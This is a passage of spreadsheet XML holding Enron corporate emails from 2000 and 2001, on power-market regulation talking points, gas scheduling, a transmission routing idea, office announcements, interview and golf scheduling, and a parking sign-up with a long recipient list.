I'm going to change this deal to TransAlta (US) if its okay with you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 09:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: INTERIM MODEL TALKING POINTS</t>
  </si>
  <si>
    <t xml:space="preserve">Can we focus the PJM language as an interim fix toward the East (while maybe _x000D_
the threat of PJM in the West will make the West RTOs act quickly and adopt _x000D_
everything that Steve W. has been advocating).  Also, I agree with the ISO _x000D_
being required to provide much greater information on where the congestion _x000D_
occurs.  While the allocation of FTRs is a problem and the idiosyncratic _x000D_
nature is also a problem, it is because the traders do not have access to all _x000D_
the information.  They have told me that if they had access to all the _x000D_
information about congestion from the past several years, they could _x000D_
essentially build a model for anticipated congestion that could trade "above" _x000D_
the underlying FTRs as financial instruments._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steve Walton_x000D_
06/18/2001 03:30 PM_x000D_
To: James D Steffes/NA/Enron@ENRON_x000D_
cc: Christi L Nicolay/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron _x000D_
_x000D_
Subject: Re: INTERIM MODEL TALKING POINTS  _x000D_
_x000D_
Jim,_x000D_
_x000D_
 I have added my comments to your draft.  My concern with the "Adopt PJM" _x000D_
approach is that it will become a fiat accompli with regard to congestion _x000D_
management. and the nature of future transmission rights.  Once adopted as _x000D_
the standard, nothing else will be accepted and any move to a decentralized _x000D_
approach is highly unlikely.  Unlike the British, we have a hard time _x000D_
changing horses because of our multi-jurisdictional Federal system of _x000D_
government._x000D_
_x000D_
 The PJM's lack of a secondary FTR market is more that just an allocation _x000D_
problem.  If that were true, they New York would have a secondary market -- _x000D_
none exists there either.  The unpredictability of prices is probably the _x000D_
biggest problem since no one knows how to value FTRs or TCCs.  I think the _x000D_
nature of instrument is also not particularly helpful._x000D_
_x000D_
 During our discussion of Seabron Adamson's last draft, I maintained that a _x000D_
centralized unit commitment process didn't fit the Pacific Northwest (PNW) _x000D_
with its pattern of trading to achieve coordination between hydroelectric and _x000D_
thermoelectric generation.  You asked me to provide more detail hydro-thermal _x000D_
operation.  I am including a paper that covers the nature of PNW operations _x000D_
and contracting with observations about the nature of unit commitment.  Given _x000D_
other work and travel, it has taken some time to complete the paper and its _x000D_
examples.  I hope this will help to explain why I am hesitant to endorse a _x000D_
centralize unit commitment implementation._x000D_
_x000D_
Steve_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	James D Steffes@ENRON_x000D_
	06/18/2001 01:48 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Christi L _x000D_
Nicolay/HOU/ECT@ECT, Sarah Novosel/Corp/Enron@ENRON, Steve Walton/HOU/ECT_x000D_
		 cc: _x000D_
		 Subject: INTERIM MODEL TALKING POINTS_x000D_
_x000D_
Here is the draft of an Interim step for Enron to give to Lay.  Please give _x000D_
me your comments.  This is CONFIDENTIAL and should not be shared outside the _x000D_
company._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 08:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike_e_woods@dom.com', 'dick.jenkins@enron.com', 'ddotson@aglresources.com', 'gascontrol@aglresources.com', 'bfreeman@aglresources.com', 'victor.lamadrid@enron.com', 'chris.germany@enron.com', 'mark.breese@enron.com'})</t>
  </si>
  <si>
    <t>October 1 &amp; 2 VNG setup</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the VNG daily setup for October 1st and 2nd. Please call if you _x000D_
have any questions._x000D_
_x000D_
Bob Superty 713-853-0957_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 11:57:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'abrock@poloralphlauren.com'})</t>
  </si>
  <si>
    <t>RE: Happy Halloween</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Yuck - The hearing just got cancelled (I was on the way to the airport when notified) and rescheduled for Tuesday. Right now I'm scheduled to come up on Monday instead.  I'll call you when I know more._x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 13:31:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jahartn@ppco.com'})</t>
  </si>
  <si>
    <t>frozenset({'walt.serrano@enron.com'})</t>
  </si>
  <si>
    <t>November Statements</t>
  </si>
  <si>
    <t>Please begin sending the Phillips Petroleum statements to me at the_x000D_
following e-mail address (jahartn@ppco.com).  Jennifer Littau is no longer_x000D_
the accountant handling these properties.  Jennifer has forwarded the_x000D_
November statements to me, but I would appreciate your sending them to me_x000D_
directly in January.  If you have any questions, please feel free to_x000D_
contact me._x000D_
_x000D_
Thank you for your assistance._x000D_
_x000D_
Julie Hartness_x000D_
Rocky Mountain Division_x000D_
1180 Plaza Office Bldg._x000D_
Bartlesville, OK_x000D_
(918) 661-5810</t>
  </si>
  <si>
    <t>Sun, 17 Jun 2001 20:06:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>NEW TRANSMISSION IDEA</t>
  </si>
  <si>
    <t>As the southwest heats up, or the ISO goes into stages of emergency, or path 15 is congested north to south we will want to get power from the northwest utilities down to APS and so on in the southwest.  We can do this many ways but one that I have discovered that may have much capacity is as follows._x000D_
_x000D_
1.  NW Utility to PAC on BPA(T)_x000D_
2.  PACW to IPC(T)@Enterprise(ENPR) on PAC(T)_x000D_
3.  IPC@ENPR to PAC(T)@Borah Brady(BOBR) on IPC(T)_x000D_
4.  IPC@BOBR to Four Corners(FC3) on PAC(T)_x000D_
5.  Sink with anyone at four corners or buy tranny over to palo or mead._x000D_
_x000D_
I'm not sure how long there is going to be room but for monday there is 400mw of room on this path._x000D_
_x000D_
_x000D_
Enjoy,_x000D_
_x000D_
Slinger</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 12:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'steven.harris@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'mark.mcconnell@enron.com'})</t>
  </si>
  <si>
    <t>RE: Capacity Available - Team Discussion</t>
  </si>
  <si>
    <t>_x000D_
This meeting will provide an update on the work that I have been doing regarding Price Spreads and Available Capacity in the future._x000D_
_x000D_
Paul_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Robertson, Audrey  _x000D_
Sent:	Tuesday, November 06, 2001 11:25 AM_x000D_
To:	Harris, Steven; Watson, Kimberly; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; McConnell, Mark; Y'Barbo, Paul_x000D_
Subject:	Capacity Available - Team Discussion_x000D_
_x000D_
_x000D_
Kim would like the Marketing Team to meeting with Steve to discuss the above mentioned topic, Friday morning, November 16, 9:00 a.m., ECN-1336._x000D_
_x000D_
Please mark your calendars accordingly._x000D_
_x000D_
adr_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company _x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 00:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron In Action 04.03.00</t>
  </si>
  <si>
    <t>lHAPPENINGSl_x000D_
&gt;Enron is underwritingThe Golden Age of Chinese Archaeology: Celebrated _x000D_
Discoveries from the People's Republic of China at The Museum of Fine Art, _x000D_
Houston.  Please join us on Saturday, April 15th to explore this incredible _x000D_
exhibit.  Tickets are available at half hour intervals from 10:30 a.m. - 4:00 _x000D_
p.m.  Please pick up your tickets from Patti Walsh at EB2015a._x000D_
&gt;Enron's Blood Drive will take place on April 20.  Call x37514 to schedule an _x000D_
appointment.  ADDED BONUS:  Men over 40 donating blood can get a FREE PSA _x000D_
test!_x000D_
_x000D_
ISCREENINGSl_x000D_
&gt;MD Anderson Mobile Unit will perform mammograms during the week of April 17 _x000D_
- 21 on Andrew's St.  Call MD Anderson at (713) 745-7000 to schedule an _x000D_
appt.  Space limited.  Help a less fortunate woman get a mammogram by making _x000D_
a donation to The Rose!  Enron will match your contribution._x000D_
_x000D_
ISAVE THE DATEI  _x000D_
&gt;The Enron Company Picnic is Sunday, May 7, 10:00 a.m. - 8:00 p.m. @ _x000D_
AstroWorld.  Tickets will be on sale Monday, April 10 - Friday, April 14 in _x000D_
the Enron Lobby.  The first six tickets are $5 each -- $20 for each _x000D_
additional ticket.</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 08:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff_hines@hines.com'})</t>
  </si>
  <si>
    <t>Re: Membership question</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
Unfortunately, Jeff doesn't have any information on Rick Barsky.  Would you _x000D_
like for me to try and get information from anyone else?_x000D_
_x000D_
Thanks,_x000D_
Joannie_x000D_
joannie.williamson@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff_Hines@hines.com on 05/01/2001 11:26:22 AM_x000D_
To: jeff.skilling@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Membership question_x000D_
_x000D_
_x000D_
Through YPO International, we got a membership inquiry from Rick Barsky,_x000D_
CEO of Agennix(don't know what company does).  He apparently used to work_x000D_
at Enron.  Bio says he was involved in start up of Enron Renewable Energy_x000D_
Corp. and Enron Solar.  Any input you can give us on this guy?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 05:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bullet points for Rick</t>
  </si>
  <si>
    <t xml:space="preserve">Per your request, here is the expanded version of the EBS bullet points from_x000D_
Donald and I._x000D_
_x000D_
----- Forwarded by Scott Bolton/Enron Communications on 10/03/00 11:46 AM _x000D_
-----_x000D_
|-------------------------+-------------------------+-------------------------_x000D_
|_x000D_
|                         |   Donald Lassere        |                         _x000D_
|_x000D_
|                         |                         |   ? ? ? ? To: _x000D_
? ? ? ?Sue|_x000D_
|                         |   10/02/00 03:13 PM     |   Nord/NA/Enron@Enron   _x000D_
|_x000D_
|                         |                         |   ? ? ? ? cc:           _x000D_
|_x000D_
|                         |                         |   Scott Bolton/Enron    _x000D_
|_x000D_
|                         |                         |   Communications@Enron  _x000D_
|_x000D_
|                         |                         |   Communications        _x000D_
|_x000D_
|                         |                         |   ? ? ? ? Subject:      _x000D_
|_x000D_
|                         |                         |   Bullet points for _x000D_
Rick|_x000D_
|-------------------------+-------------------------+-------------------------_x000D_
|_x000D_
_x000D_
_x000D_
_x000D_
YR2000_x000D_
_x000D_
Protect and Enhance Existing Assets and Positions_x000D_
_x000D_
BLM/Forest Service Rights-of-Way Issue - Defeat new federal policy to charge_x000D_
exorbitant fees and conditions on right-of-way usage._x000D_
Day-to-day Global Risk Management support - Providing regulatory and_x000D_
analytical support to Trading desk and to commercial deal teams to mitigate_x000D_
regulatory risk and structure deals to avoid regulatory/policy obstacles._x000D_
_x000D_
Support Potential Transactions_x000D_
Curtailment of USF, taxes and avoidance of common carrier regulation -_x000D_
Provide deal structuring support to limit financial risk to commercial_x000D_
groups and trading desk._x000D_
Provided regulatory analysis to allow bandwidth to be traded on EOL -_x000D_
Provided due diligence and structuring advice to allow bandwidth to be_x000D_
bought and sold in a new on-line format; avoiding common carrier regulation_x000D_
due to new format._x000D_
_x000D_
_x000D_
New Market Development_x000D_
Domestic licensing initiative to support of BWT - Enabling greater time_x000D_
to market for bandwidth trading by securing state PUC certificates._x000D_
This initiative also allows physical infrastructure deployment as part_x000D_
of bandwidth trading network architecture._x000D_
Latin American and Canadian regulatory analysis and licensing to support_x000D_
BWT and Media Cast - Performed basic market entry licensing for_x000D_
commercial teams with an emphasis on avoiding traditional regulation on_x000D_
Media cast and advanced services._x000D_
_x000D_
_x000D_
Create and Exploit Opportunities_x000D_
Ability to obtain Wholesale Prices on Bandwidth and Interconnection -_x000D_
Using regulatory conditions of the '96mTelecom Act to improve_x000D_
positions and quickly provision services to customers._x000D_
Avoidance of "telecommunications service" regulation of Internet Apps,_x000D_
IP Products and Media Cast ?- Carefully guided commercial groups in_x000D_
legal structure, marketing, tax, and physical deployment of service to_x000D_
avoid traditional telecom regulation._x000D_
_x000D_
_x000D_
YR2001_x000D_
Protect and Enhance Existing Assets and Positions_x000D_
Legislative action in support of BLM/Forest Service Rights-of-Way_x000D_
Issue - Continue to curtail onerous right-of-way regulation;_x000D_
participate in federal avisory commission on right-of-way use._x000D_
Continued day-to-day Global Risk Management support - Provide_x000D_
regulatory and analytical support to Trading desk and to commercial_x000D_
deal teams to mitigate regulatory risk and structure deals to avoid_x000D_
regulatory/policy obstacles._x000D_
_x000D_
Support Potential Transactions_x000D_
Support Blockbuster VOD and other multimedia initiatives -_x000D_
Provide regulatory due diligence and policy support to enable VOD_x000D_
and other advanced services to be rolled-out. ?Coordinate EBS_x000D_
efforts with content and distribution partners._x000D_
Continued curtailment of USF, taxes and avoidance of common_x000D_
carrier regulation of Bandwidth Trading in the Americas -_x000D_
Continue structuring advice to comply with country regulation and_x000D_
the mitigation of financial and regulatory risk._x000D_
_x000D_
New Market Development_x000D_
Spectrum trading and new markets - Supporting commercial teams_x000D_
by providing research and policy development to open new_x000D_
markets or make existing markets more competitive._x000D_
Deregulation/regulatory forbearance in Latin America - Begin_x000D_
pro-competitive de-regulation effort in "closed" market_x000D_
countries on Latin America._x000D_
_x000D_
_x000D_
Create and Exploit Opportunities_x000D_
Establishment of national CLECs in North and South America -_x000D_
This initiative will allow the deployment of infrastructure_x000D_
for bandwidth trading and local loop provisioning._x000D_
Collaborate with International Tax to minimize EBS's tax_x000D_
exposure in Latin America and Canada ?- ? Develop_x000D_
structuring models to reduce tax risk on international_x000D_
transactions; seek rulings on how cross-bporder bandwidth_x000D_
transactions will be treated._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 17:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Steve!   Thanks for the alert!    I did just call the Pro Shop one more time and spoke with a young lady by the name of Ashley, and she confirms that you guys are slated to tee off on Sunday at 8:15AM on the Old Course off #1._x000D_
_x000D_
Hit  'em straight!_x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"DFS International, Inc." &lt;dfsintl@swbell.net&gt; on 05/24/2001 01:43:44 PM_x000D_
To:	Stanley.Horton@enron.com_x000D_
cc:	 _x000D_
_x000D_
Subject:	RE: Sunday Golf at Rav_x000D_
_x000D_
_x000D_
Thank you Cindy!   I check with Raveneaux this morning as I was already_x000D_
there.  The Pro Shop said there was no tee time for Horton.   I am sure they_x000D_
just over looked it.  Just in case however,  I reserved a 9:45 am on the New_x000D_
Course as a backup.  You may want to double check with the Pro Shop.  Thank_x000D_
you again.  Please meeting you via e-mail._x000D_
_x000D_
Best regards._x000D_
Steve Westlund_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 May 2000 03:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stinson.gibner@enron.com', 'pinnamaneni.krishnarao@enron.com', 'zimin.lu@enron.com', 'grant.masson@enron.com', 'vasant.shanbhogue@enron.com', 'tanya.tamarchenko@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Re: Bruno Repetto Interview with Enron Corp. Research Group</t>
  </si>
  <si>
    <t>Bruno Repetto will be in the office on May 11 beginning at 1:00 PM._x000D_
_x000D_
Following is the interview schedule:_x000D_
_x000D_
Vince Kaminski  1:00 PM_x000D_
Stinson Gibner  1:30 PM_x000D_
Grant Masson  2:00 PM_x000D_
Vasant Shanbhogue 2:30 PM_x000D_
Krishna Krishnarao 3:00 PM_x000D_
Zimin Lu  3:30 PM_x000D_
Tany Tamarchenko 4:00 PM_x000D_
_x000D_
All interviews will be conducted in EB1938._x000D_
_x000D_
The calendars that I have access to have already been marked._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 00:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Please sign me up._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kevin Ruscitti x3-6320_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Parking &amp; Transportation@ENRON_x000D_
03/28/2001 04:07 PM_x000D_
Sent by: DeShonda Hamilton@ENRON_x000D_
To: Brad Alford/NA/Enron@Enron, Megan Angelos/Enron@EnronXGate, Suzanne _x000D_
Adams/HOU/ECT@ECT, John Allario/Enron@EnronXGate, Phillip K _x000D_
Allen/HOU/ECT@ECT, Irma Alvarez/Enron@EnronXGate, Airam Arteaga/HOU/ECT@ECT, _x000D_
Berney C Aucoin/HOU/ECT@ECT, Peggy Banczak/HOU/ECT@ECT, Robin _x000D_
Barbe/HOU/ECT@ECT, Edward D Baughman/Enron@EnronXGate, Pam _x000D_
Becton/Enron@EnronXGate, Corry Bentley/HOU/ECT@ECT, Patricia _x000D_
Bloom/Enron@EnronXGate, Sandra F Brawner/HOU/ECT@ECT, Jerry _x000D_
Britain/Enron@EnronXGate, Lisa Bills/Enron@EnronXGate, Michelle _x000D_
Blaine/ENRON@enronXgate, Eric Boyt/Corp/Enron@Enron, Cheryl _x000D_
Arguijo/Enron@EnronXGate, Jeff Ader/HOU/EES@EES, Mark Bernstein/HOU/EES@EES, _x000D_
Kimberly Brown/HOU/ECT@ECT, Gary Bryan/HOU/ECT@ECT, Rebecca W _x000D_
Cantrell/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Carol Carter/Enron@EnronXGate, _x000D_
Carmen Chavira/Enron@EnronXGate, Christopher K Clark/Enron@EnronXGate, Morris _x000D_
Richard Clark/Enron@EnronXGate, Terri Clynes/HOU/ECT@ECT, Karla _x000D_
Compean/Enron@EnronXGate, Ruth Concannon/HOU/ECT@ECT, Patrick _x000D_
Conner/HOU/ECT@ECT, Sheri L Cromwell/Enron@EnronXGate, Edith _x000D_
Cross/HOU/ECT@ECT, Martin Cuilla/HOU/ECT@ECT, Mike Curry/Enron@EnronXGate, _x000D_
Michael Danielson/SF/ECT@ECT, Peter del Vecchio/HOU/ECT@ECT, Barbara G _x000D_
Dillard/Corp/Enron@Enron@ECT, Rufino Doroteo/Enron@EnronXGate, Christine _x000D_
Drummond/HOU/ECT@ECT, Tom Dutta/HOU/ECT@ECT, Laynie East/Enron@EnronXGate, _x000D_
John Enerson/HOU/ECT@ECT, David Fairley/Enron@EnronXGate, Nony _x000D_
Flores/HOU/ECT@ECT, Craig A Fox/Enron@EnronXGate, Julie S _x000D_
Gartner/Enron@EnronXGate, Maria Garza/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, _x000D_
Monica Butler/Enron@EnronXGate, Chris Clark/NA/Enron@Enron, Christopher _x000D_
Coffman/Corp/Enron@Enron, Ron Coker/Corp/Enron@Enron, John _x000D_
Coleman/EWC/Enron@Enron, Nicki Daw/Enron@EnronXGate, Ranabir _x000D_
Dutt/Enron@EnronXGate, Kurt Eggebrecht/ENRON@enronxgate, Marsha _x000D_
Francis/Enron@EnronXGate, Robert H George/NA/Enron@Enron, Nancy _x000D_
Corbet/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Margaret _x000D_
Doucette/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Maria E _x000D_
Garcia/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Humberto _x000D_
Cubillos-Uejbe/HOU/EES@EES, Barton Clark/HOU/ECT@ECT, Ned E _x000D_
Crady/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stinson Gibner/HOU/ECT@ECT, Stacy _x000D_
Gibson/Enron@EnronXGate, George N Gilbert/HOU/ECT@ECT, Mathew _x000D_
Gimble/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, Alisa Green/Enron@EnronXGate, _x000D_
Robert Greer/HOU/ECT@ECT, Wayne Gresham/HOU/ECT@ECT, Mike _x000D_
Grigsby/HOU/ECT@ECT, Linda R Guinn/HOU/ECT@ECT, Cathy L Harris/HOU/ECT@ECT, _x000D_
Tosha Henderson/HOU/ECT@ECT, Scott Hendrickson/HOU/ECT@ECT, Nick _x000D_
Hiemstra/HOU/ECT@ECT, Kimberly Hillis/Enron@EnronXGate, Dorie _x000D_
Hitchcock/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Georgeanne _x000D_
Hodges/Enron@EnronXGate, Jeff Hoover/HOU/ECT@ECT, Brad Horn/HOU/ECT@ECT, John _x000D_
House/HOU/ECT@ECT, Joseph Hrgovcic/Enron@EnronXGate, Dan J Hyvl/HOU/ECT@ECT, _x000D_
Steve Irvin/HOU/ECT@ECT, Rhett Jackson/Enron@EnronXGate, Patrick _x000D_
Johnson/HOU/ECT@ECT, Amy Jon/Enron@EnronXGate, Tana Jones/HOU/ECT@ECT, Peter _x000D_
F Keavey/HOU/ECT@ECT, Jeffrey Keenan/HOU/ECT@ECT, Brian _x000D_
Kerrigan/Enron@EnronXGate, Kyle Kettler/HOU/ECT@ECT, Faith _x000D_
Killen/Enron@EnronXGate, Joe Gordon/Enron@EnronXGate, Bruce _x000D_
Harris/NA/Enron@Enron, Chris Herron/Enron@EnronXGate, Melissa _x000D_
Jones/NA/Enron@ENRON, Lynna Kacal/Enron@EnronXGate, Allan _x000D_
Keel/Enron@EnronXGate, Mary Kimball/NA/Enron@Enron, Bruce _x000D_
Golden/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kim _x000D_
Hickok/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Elizabeth Howley/HOU/EES@EES, _x000D_
John King/Enron Communications@Enron Communications, Jeff _x000D_
Kinneman/Enron@EnronXGate, Troy Klussmann/Enron@EnronXGate, Mark _x000D_
Knippa/HOU/ECT@ECT, Deb Korkmas/HOU/ECT@ECT, Heather Kroll/Enron@EnronXGate, _x000D_
Kevin Kuykendall/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, Andrew H _x000D_
Lewis/HOU/ECT@ECT, Lindsay Long/Enron@EnronXGate, Blanca A _x000D_
Lopez/Enron@EnronXGate, Gretchen Lotz/HOU/ECT@ECT, Dan Lyons/HOU/ECT@ECT, _x000D_
Molly Magee/Enron@EnronXGate, Kelly Mahmoud/HOU/ECT@ECT, David _x000D_
Marks/HOU/ECT@ECT, Greg Martin/HOU/ECT@ECT, Jennifer Martinez/HOU/ECT@ECT, _x000D_
Deirdre McCaffrey/HOU/ECT@ECT, George McCormick/Enron@EnronXGate, Travis _x000D_
McCullough/HOU/ECT@ECT, Brad McKay/HOU/ECT@ECT, Brad _x000D_
McSherry/Enron@EnronXGate, Lisa Mellencamp/HOU/ECT@ECT, Kim _x000D_
Melodick/Enron@EnronXGate, Chris Meyer/HOU/ECT@ECT, Mike J _x000D_
Miller/HOU/ECT@ECT, Don Miller/HOU/ECT@ECT, Patrice L Mims/HOU/ECT@ECT, _x000D_
Yvette Miroballi/Enron@EnronXGate, Fred Mitro/HOU/ECT@ECT, Eric _x000D_
Moon/HOU/ECT@ECT, Janice R Moore/HOU/ECT@ECT, Greg Krause/Corp/Enron@Enron, _x000D_
Steven Krimsky/Corp/Enron@Enron, Shahnaz Lakho/NA/Enron@Enron, Chris _x000D_
Lenartowicz/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron, Judy _x000D_
Martinez/Enron@EnronXGate, Jesus Melendrez/Enron@EnronXGate, Michael L _x000D_
Miller/NA/Enron@Enron, Stephanie Miller/Corp/Enron@ENRON, Veronica _x000D_
Montiel/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kenneth Krasny/Enron@EnronXGate, _x000D_
Janet H Moore/HOU/ECT@ECT, Brad Morse/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, _x000D_
Gerald Nemec/HOU/ECT@ECT, Jesse Neyman/HOU/ECT@ECT, Mary Ogden/HOU/ECT@ECT, _x000D_
Sandy Olitsky/HOU/ECT@ECT, Roger Ondreko/Enron@EnronXGate, Ozzie _x000D_
Pagan/Enron@EnronXGate, Rhonna Palmer/Enron@EnronXGate, Anita K _x000D_
Patton/HOU/ECT@ECT, Laura R Pena/HOU/ECT@ECT, Susan W Pereira/HOU/ECT@ECT, _x000D_
Debra Perlingiere/HOU/ECT@ECT, John Peyton/HOU/ECT@ECT, Paul _x000D_
Pizzolato/Enron@EnronXGate, Laura Podurgiel/HOU/ECT@ECT, David _x000D_
Portz/HOU/ECT@ECT, Joan Quick/Enron@EnronXGate, Dutch Quigley/HOU/ECT@ECT, _x000D_
Pat Radford/HOU/ECT@ECT, Ina Rangel/HOU/ECT@ECT, Robert W Rimbau/HOU/ECT@ECT, _x000D_
Andrea Ring/HOU/ECT@ECT, Amy Rios/Enron@EnronXGate, Benjamin _x000D_
Rogers/HOU/ECT@ECT, Kevin Ruscitti/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, _x000D_
Richard B Sanders/HOU/ECT@ECT, Janelle Scheuer/Enron@EnronXGate, Lance _x000D_
Schuler-Legal/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Jean _x000D_
Mrha/NA/Enron@Enron, Caroline Nugent/Enron@EnronXGate, Richard _x000D_
Orellana/ENRON@enronXgate, Michelle Parks/Enron@EnronXGate, Steve _x000D_
Pruett/Enron@EnronXGate, Mitch Robinson/Corp/Enron@Enron, Susan _x000D_
Musch/Enron@EnronXGate, Larry Pardue/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Daniel R Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Frank _x000D_
Sayre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kevin P Radous/Corp/Enron@Enron, _x000D_
Tammy R Shepperd/Enron@EnronXGate, Cris Sherman/Enron@EnronXGate, Hunter S _x000D_
Shively/HOU/ECT@ECT, Lisa Shoemake/HOU/ECT@ECT, James Simpson/HOU/ECT@ECT, _x000D_
Jeanie Slone/Enron@EnronXGate, Gregory P Smith/Enron@EnronXGate, Susan _x000D_
Smith/Enron@EnronXGate, Will F Smith/Enron@EnronXGate, Maureen _x000D_
Smith/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, _x000D_
Fletcher J Sturm/HOU/ECT@ECT, John Swafford/Enron@EnronXGate, Ron _x000D_
Tapscott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Stephen Thome/HOU/ECT@ECT, _x000D_
Larry Valderrama/Enron@EnronXGate, Steve Van Hooser/HOU/ECT@ECT, Hope _x000D_
Vargas/Enron@EnronXGate, Brian Vass/HOU/ECT@ECT, Victoria Versen/HOU/ECT@ECT, _x000D_
Charles Vetters/HOU/ECT@ECT, Janet H Wallis/HOU/ECT@ECT, Samuel _x000D_
Wehn/HOU/ECT@ECT, Jason R Wiesepape/HOU/ECT@ECT, Allen Wilhite/HOU/ECT@ECT, _x000D_
Bill Williams/PDX/ECT@ECT, Stephen Wolfe/Enron@EnronXGate, Stuart _x000D_
Zisman/HOU/ECT@ECT, George Zivic/HOU/ECT@ECT, Mary Sontag/Enron@EnronXGate, _x000D_
Eric Thode/Corp/Enron@ENRON, Carl Tricoli/Corp/Enron@Enron, Shiji _x000D_
Varkey/Enron@EnronXGate, Frank W Vickers/NA/Enron@Enron, Greg _x000D_
Whiting/Enron@EnronXGate, Becky Young/NA/Enron@Enron, Emily _x000D_
Adamo/Enron@EnronXGate, Jacqueline P Adams/HOU/ECT@ECT, Janie _x000D_
Aguayo/HOU/ECT@ECT, Peggy Alix/ENRON@enronXgate, Thresa A Allen/HOU/ECT@ECT, _x000D_
Sherry Anastas/HOU/ECT@ECT, Kristin Armstrong/Enron@EnronXGate, Veronica I _x000D_
Arriaga/HOU/ECT@ECT, Susie Ayala/HOU/ECT@ECT, Natalie Baker/HOU/ECT@ECT, _x000D_
Michael Barber/Enron@EnronXGate, Gloria G Barkowsky/HOU/ECT@ECT, Wilma _x000D_
Bleshman/Enron@EnronXGate, Dan Bruce/Enron@EnronXGate, Richard _x000D_
Burchfield/Enron@EnronXGate, Anthony Campos/HOU/ECT@ECT, Sylvia A _x000D_
Campos/HOU/ECT@ECT, Betty Chan/Enron@EnronXGate, Jason _x000D_
Chumley/Enron@EnronXGate, Marilyn Colbert/HOU/ECT@ECT, Audrey _x000D_
Cook/HOU/ECT@ECT, Diane H Cook/HOU/ECT@ECT, Magdelena Cruz/Enron@EnronXGate, _x000D_
Bridgette Anderson/Corp/Enron@ENRON, Walt Appel/ENRON@enronXgate, David _x000D_
Berberian/Enron@EnronXGate, Sherry Butler/Enron@EnronXGate, Rosie _x000D_
Castillo/Enron@EnronXGate, Christopher B Clark/Corp/Enron@Enron, Patrick _x000D_
Davis/Enron@EnronXGate, Larry Cash/Enron Communications@Enron Communications, _x000D_
Mathis Conner/Enron@EnronXGate, Lawrence R Daze/Enron@EnronXGate, Rhonda L _x000D_
Denton/HOU/ECT@ECT, Bradley Diebner/Enron@EnronXGate, Anna M _x000D_
Docwra/HOU/ECT@ECT, Kenneth D'Silva/HOU/ECT@ECT, Karen Easley/HOU/ECT@ECT, _x000D_
Kenneth W Ellerman/Enron@EnronXGate, Allen Elliott/Enron@EnronXGate, Rene _x000D_
